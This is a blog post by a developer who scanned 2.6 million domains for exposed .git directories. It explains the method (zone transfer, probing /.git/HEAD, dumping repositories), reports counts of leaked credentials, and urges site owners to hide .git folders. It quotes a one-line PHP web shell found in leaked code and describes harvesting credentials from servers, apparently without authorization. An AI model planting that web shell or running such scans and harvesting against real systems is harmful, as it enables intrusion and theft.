Here's What I Found on Scanning 2.6 Million Domains for Exposed Git Directories

Written by sdcat | Published 2022/10/24
Tech Story Tags: git | devops | web-app-development | cyber-security | software-development | github | gitlab | web-development

TLDRA software developer scanned 2.6 million domains for exposed git directories and found more than 1000 public git repositories. These repositories contained harmless data like template files or static HTML pages. Some repositories revealed interesting things such as source code for web applications, databases credentials, Office 365 admin logins, private keys or RCE (remote code execution) possibilities. Even if you do not have the directory listing of a git folder from the webserver, you can download the entire content of the repository. Never expose your hidden git folder to the public.via the TL;DR App

I scanned 2.6 million domains for exposed git directories and found more than 1000 public git repositories. These repositories contained harmless data like template files or static HTML pages.
However, some repositories revealed interesting things such as complete source code for web applications, configuration files with API keys, usernames, and passwords, databases credentials, Office 365 admin logins, private keys, or RCE (remote code execution) possibilities.
Even if you do not have the directory listing of a git folder from the web server, you can download the entire content of the repository.
TLDR: Watch out for mistakes in the deployment process. Never expose your hidden .git folder to the public.

Why I did do this?

I am SDCat a software developer with a curious mind who loves to look everywhere under the hood. I read about the problem of public .git directories and thought I’d check it out.
In this post, I describe, what a git repository is, how I scanned the domains, and some stats about what was found in these repositories. The analysis of this data sometimes revealed shocking details about a software project.

Git repository

In software development, it is normal to use some sort of source control software. One of these source control software is git, which is free and open source. In source control software, the whole history of the source code is saved. You can keep track of each and every change in your code and you can go back in time to an old version of your code.
Git uses a hidden directory called .git in your project root to save all the code, assets, and metadata. From the data in the .git directory, you can construct the whole source code for each saved version. Even if you committed a configuration file with an API key and removed this API key at a later date, the old commit will still find the API key.

Why is an exposed git repository interesting/dangerous?

For me, it was very interesting and sometimes shocking to scan 2.6 million domains for exposed git repositories. What I found in the source code could harm a company in different ways. For one it is the code, which will be leaked.
Sometimes you will find API keys or credentials for databases or email accounts, Office 365 admin accounts, or whole database backups. With deeper analysis of the source code (in this case PHP) some remote code execution possibilities were found:
<?php
echo system($_POST['cmd']);
?>
With this little code snippet, everybody can execute arbitrary code on the server.
But this is not the end. In the config file (.git/config) of the git repositories, I found the access credential for the whole source code management system (like GitHub or GitLab), with unrestricted admin access. This is due to the issue, that the user and password were set in the URL like https://username:password@gitlab.com/.

How did I scan 2.6 million domains for exposed git repositories

Getting the domains
I chose a country that allows for DNS zone transfer to obtain all the domains of this country. It will take some time to download the complete zone file. With a simple python script, I extracted the NS records and from these records the domain names.
Scanning process
With another python script, I read the domains and send a request to <domain>/.git/HEAD and checked if the response body contains ‘refs/heads’. The request was sent via HTTP and HTTPS.
It is important to ignore the SSL certificate check. I learned that many git repositories were found over HTTPS but with an invalid certificate. By ignoring the invalid SSL certificates these directories can be accessed anyway.
If a git repository was found I also requested the /.git/config file from the server and checked if it contains a username or even a password to the source control system.
Source code
The git repository was downloaded and extracted with a slightly modified version of GitDumper (https://github.com/internetwache/GitTools, many thanks to @gehaxelt for this awesome project).
Sometimes the web server did not provide access to the whole .git folder and some files could not be accessed. I could not figure out why, but even if some files were not accessible I could extract some code from most of the repositories.
With the Git Extractor script all the versions of the code were extracted. With all the different versions and source code files, you can use the search method to find interesting things.
Stats
I scanned 2.6 million domains. Unfortunately, I did not log how many did not respond. I found:
1053 fully or partially exposed git repositories161 usernames in the git config data12 usernames with passwords in the git config data
These are the results of only the main domains. Imagine what would happen if we scan all the subdomains. I have no doubt you’d find a lot more there.
Even after I parallelized the scanning script it took some days to scan the 2.6 million domains. I did not expect many results but was surprised by how widespread the problem is.
Takeaway: Check your server and deployment to not expose the hidden .git folder.

Written by sdcat | Software developing cat
Published by HackerNoon on 2022/10/24